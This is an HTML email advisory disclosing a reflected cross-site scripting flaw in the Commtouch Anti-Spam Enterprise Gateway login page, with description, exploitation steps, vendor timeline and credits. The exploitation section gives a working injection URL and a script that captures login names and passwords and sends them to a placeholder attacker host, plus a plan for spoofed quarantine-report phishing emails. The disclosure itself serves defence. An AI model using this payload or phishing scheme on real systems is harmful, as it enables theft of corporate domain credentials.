<html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:w="urn:schemas-microsoft-com:office:word" xmlns:x="urn:schemas-microsoft-com:office:excel" xmlns="http://www.w3.org/TR/REC-html40">

<head>

<meta http-equiv=Content-Type content="text/html; charset=us-ascii">

<meta name=Generator content="Microsoft Word 11 (filtered medium)">

<style>

<!--

 /* Font Definitions */

 @font-face

        {font-family:Tahoma;

        panose-1:2 11 6 4 3 5 4 4 2 4;}

@font-face

        {font-family:Verdana;

        panose-1:2 11 6 4 3 5 4 4 2 4;}

 /* Style Definitions */

 p.MsoNormal, li.MsoNormal, div.MsoNormal

        {margin:0in;

        margin-bottom:.0001pt;

        text-align:right;

        direction:rtl;

        unicode-bidi:embed;

        font-size:12.0pt;

        font-family:"Times New Roman";}

a:link, span.MsoHyperlink

        {color:blue;

        text-decoration:underline;}

a:visited, span.MsoHyperlinkFollowed

        {color:purple;

        text-decoration:underline;}

span.EmailStyle17

        {mso-style-type:personal-compose;

        font-family:Arial;

        color:windowtext;}

span.a1

        {color:green;}

@page Section1

        {size:595.3pt 841.9pt;

        margin:1.0in 1.25in 1.0in 1.25in;}

div.Section1

        {page:Section1;}

 /* List Definitions */

 @list l0

        {mso-list-id:1401446426;

        mso-list-type:hybrid;

        mso-list-template-ids:-867282020 67698705 67698713 67698715 67698703 67698713 67698715 67698703 67698713 67698715;}

@list l0:level1

        {mso-level-text:"%1\)";

        mso-level-tab-stop:.5in;

        mso-level-number-position:left;

        text-indent:-.25in;}

ol

        {margin-bottom:0in;}

ul

        {margin-bottom:0in;}

-->

</style>

<!--[if gte mso 9]><xml>

 <o:shapedefaults v:ext="edit" spidmax="1026" />

</xml><![endif]--><!--[if gte mso 9]><xml>

 <o:shapelayout v:ext="edit">

  <o:idmap v:ext="edit" data="1" />

 </o:shapelayout></xml><![endif]-->

</head>

<body lang=EN-US link=blue vlink=purple>        <table align="center" border="0" id="28FCE90E-9FBC-44da-BBF7-D3997DC20E83">

                        <tr>

                                <td align="center">

                                <a href='http://www.admail.co.il/Statistics/Redirect.aspx?cid=1286&camp=1&til=http://www.2bsecure.co.il' target='_blank'><img src='cid:AdmailImg1' border='0'></a>

                                <br>

                                </td>        

                        </tr><tr>

                                <td style="BORDER-TOP: silver 1px solid">&nbsp;</td>

                        </tr>

                </table>

<div class=Section1 dir=RTL>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>Commtouch

Anti-Spam Enterprise Gateway Cross Site Scripting (allowing domain credential theft)<br>

<br>

I. INTRODUCTION<br>

<br>

Commtouch Anti-Spam Enterprise Gateway is an anti spam solution, protecting enterprise

networks for the ever increasing spam emails. The anti spam solution includes a

web application console which enables the enterprise users to check the blocked

messages, release messages, apply blocking rules and more. <o:p></o:p></span></font></p>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><br>

For more Information please refer to:<br>

</span></font><span class=a1><font size=2 color=green face=Arial><span

style='font-size:10.0pt;font-family:Arial'><a href="http://www.commtouch.com/">www.<b><span

style='font-weight:bold'>commtouch</span></b>.com</a></span></font></span><font

size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><o:p></o:p></span></font></p>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><br>

<br>

II. DESCRIPTION<br>

<br>

A reflected XSS vulnerability was discovered by Erez Metula in the product

login page which enables an attacker to steal a victim's credential to the corporate

network. Since the login credentials are usually the victim's credentials to

the domain, it is a high risk vulnerability which puts the whole domain

passwords at risk.<o:p></o:p></span></font></p>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><o:p>&nbsp;</o:p></span></font></p>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>Apart

from being used as a regular reflected XSS attack vector, for example by sending

a malicious link to the user, there is another attack vector that can be used

which derives from the specific way the product works.<o:p></o:p></span></font></p>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>The

product sends a periodic email report to the user, listing the emails that were

identified as spam and were blocked. The user is given an option to release /

approve the mail, by clicking on the corresponding link.<o:p></o:p></span></font></p>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>Clicking

on the link brings the login page, in which the user enters his domain

credentials in order to access the web application and commit the action.<o:p></o:p></span></font></p>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>In

case an attacker sends a fake link pretending to come from the product and

containing the XSS link inside it, the user can be easily enticed to supply his

credentials in order to access the product console<o:p></o:p></span></font></p>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><o:p>&nbsp;</o:p></span></font></p>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>&nbsp;<br>

<br>

III. EXPLOITATION<br>

<br>

<o:p></o:p></span></font></p>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>As

explained above, exploitation can be achieved by traditional XSS methods by

utilizing the following pattern:<o:p></o:p></span></font></p>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>http://SERVER/AntiSpamGateway/UPM/English/login/login.asp?LoginName=XXX&amp;LoginType=1&amp;PARAMS=XXX&quot;&gt;&lt;SCRIPT&gt;PAYLOAD

&lt;/SCRIPT&gt;&lt;input%20type=&quot;hidden&quot;%20name=&quot;XXX&quot;%20value=&quot;X<o:p></o:p></span></font></p>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><o:p>&nbsp;</o:p></span></font></p>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>More

interesting is a specific exploitation tied to the product behavior, in which

an attacker will fake the &quot;My Quarantine Report&quot; coming from the

product.<o:p></o:p></span></font></p>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>Steps:<o:p></o:p></span></font></p>

<p class=MsoNormal dir=LTR style='margin-left:.5in;text-align:left;text-indent:

-.25in;mso-list:l0 level1 lfo1;direction:ltr;unicode-bidi:embed'><![if !supportLists]><font

size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><span

style='mso-list:Ignore'>1)<font size=1 face="Times New Roman"><span

style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></font></span></span></font><![endif]><span

dir=LTR><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:

Verdana'>Setting up a credential stealing page at http://ATTACKER.COM/stealer<o:p></o:p></span></font></span></p>

<p class=MsoNormal dir=LTR style='margin-left:.5in;text-align:left;text-indent:

-.25in;mso-list:l0 level1 lfo1;direction:ltr;unicode-bidi:embed'><![if !supportLists]><font

size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><span

style='mso-list:Ignore'>2)<font size=1 face="Times New Roman"><span

style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></font></span></span></font><![endif]><span

dir=LTR><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:

Verdana'>Building a fake &quot;My Querentine Report&quot; email with some

enticing &quot;release me&quot; email<o:p></o:p></span></font></span></p>

<p class=MsoNormal dir=LTR style='margin-left:.5in;text-align:left;text-indent:

-.25in;mso-list:l0 level1 lfo1;direction:ltr;unicode-bidi:embed'><![if !supportLists]><font

size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><span

style='mso-list:Ignore'>3)<font size=1 face="Times New Roman"><span

style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></font></span></span></font><![endif]><span

dir=LTR><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:

Verdana'>Replacing the content of the contained links inside the mail to<o:p></o:p></span></font></span></p>

<p class=MsoNormal dir=LTR style='margin-left:.25in;text-align:left;direction:

ltr;unicode-bidi:embed'><font size=1 face=Verdana><span style='font-size:9.0pt;

font-family:Verdana'><o:p>&nbsp;</o:p></span></font></p>

<p class=MsoNormal dir=LTR style='margin-left:.25in;text-align:left;direction:

ltr;unicode-bidi:embed'><font size=1 face=Verdana><span style='font-size:9.0pt;

font-family:Verdana'>http://SERVER/AntiSpamGateway/UPM/English/login/login.asp?LoginName=XXX&amp;LoginType=1&amp;DIRECTTO=3&amp;PARAMS=XXX&quot;&gt;&lt;script&gt;function

SendCredentials(){ img = new Image(); img.src=&quot;http://ATTACKER.COM/stealer/?userid=&quot;

+ document.forms[0].LoginName.value + &quot;&amp;amp;password=&quot; + document.forms[0].LoginPass.value;}

function HandleSubmit(){ document.forms[0].onsubmit= SendCredentials; } window.onload

= HandleSubmit;&lt;/script&gt;&lt;input%20type=&quot;hidden&quot;%20name=&quot;Params2&quot;%20value=&quot;x<o:p></o:p></span></font></p>

<p class=MsoNormal dir=LTR style='margin-left:.25in;text-align:left;direction:

ltr;unicode-bidi:embed'><font size=1 face=Verdana><span style='font-size:9.0pt;

font-family:Verdana'><o:p>&nbsp;</o:p></span></font></p>

<p class=MsoNormal dir=LTR style='margin-left:.25in;text-align:left;direction:

ltr;unicode-bidi:embed'><font size=1 face=Verdana><span style='font-size:9.0pt;

font-family:Verdana'>4) &nbsp;send the fake email, pretending to be from the commtouch

service<o:p></o:p></span></font></p>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><o:p>&nbsp;</o:p></span></font></p>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><o:p>&nbsp;</o:p></span></font></p>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>&nbsp;<br>

IV. IMPACT<br>

<br>

Since the login credentials are usually the victim's credentials to the domain,

it is a high risk vulnerability which puts the whole domain passwords at risk.<o:p></o:p></span></font></p>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><br>

<br>

V. DETECTION<br>

<br>

Detection of this vulnerability involves injecting some HTML tags / scripts to the

&quot;PARAMS&quot; parameter at the login page.<o:p></o:p></span></font></p>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><br>

VI. WORKAROUND<br>

<br>

Although originally reported for version V4 at 2006, the problem was not solved

even in version V5.<o:p></o:p></span></font></p>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>There

is no official solution yet.<o:p></o:p></span></font></p>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>The

only workaround possible is to blacklist HTML / SCRIPT tags, which can be

bypassed relatively easily and is not considered a very good solution.<o:p></o:p></span></font></p>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><o:p>&nbsp;</o:p></span></font></p>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><br>

VII. VENDOR RESPONSE<br>

<br>

Commtouch has been informed on the 7/12/06 by e-mail to their support.<br>

Commtouch didn't not fix the problem by the time of publish.<o:p></o:p></span></font></p>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><o:p>&nbsp;</o:p></span></font></p>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>&nbsp;<br>

VIII. DISCLOSURE TIMELINE<br>

<br>

<o:p></o:p></span></font></p>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>26/12/06&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Identification

of the flaw<o:p></o:p></span></font></p>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>27/12/06

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Reporting the flaw to Commtouch

by email<o:p></o:p></span></font></p>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>28/06/06

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Response from Commtouch,

asking for more description <o:p></o:p></span></font></p>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>03/01/07&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Providing

the full description to Commtouch<o:p></o:p></span></font></p>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>22/01/07&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Commtouch

acknowledge of the vulnerability<o:p></o:p></span></font></p>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>22/01/07&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Commtouch

response for an unknown deliver time for a patch<o:p></o:p></span></font></p>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>27/01/07&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Commtouch

was notified about full disclosure of this information to the public<o:p></o:p></span></font></p>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>26/06/08&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Release

of this information, after no patch nor a fix at the version V5 release<o:p></o:p></span></font></p>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><br>

IX. CREDITS<br>

<br>

The vulnerability was discovered by <o:p></o:p></span></font></p>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><br>

Erez Metula, CISSP&nbsp;&nbsp;&nbsp; <br>

Application Security Department Manager<o:p></o:p></span></font></p>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>Academic

Director, 2BAcademy</span></font><b><font size=2 color=purple face=Tahoma><span

lang=HE dir=RTL style='font-size:10.0pt;font-family:Tahoma;color:purple;

font-weight:bold'><o:p></o:p></span></font></b></p>

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:

embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>Security&nbsp;Software

Engineer<br>

E-Mail:&nbsp; erezmetula@2bsecure.co.il</span></font><font size=2 face=Arial><span

style='font-size:10.0pt;font-family:Arial'><o:p></o:p></span></font></p>

<p class=MsoNormal dir=RTL><font size=3 face="Times New Roman"><span dir=LTR

style='font-size:12.0pt'><o:p>&nbsp;</o:p></span></font></p>

</div>

</body>

</html>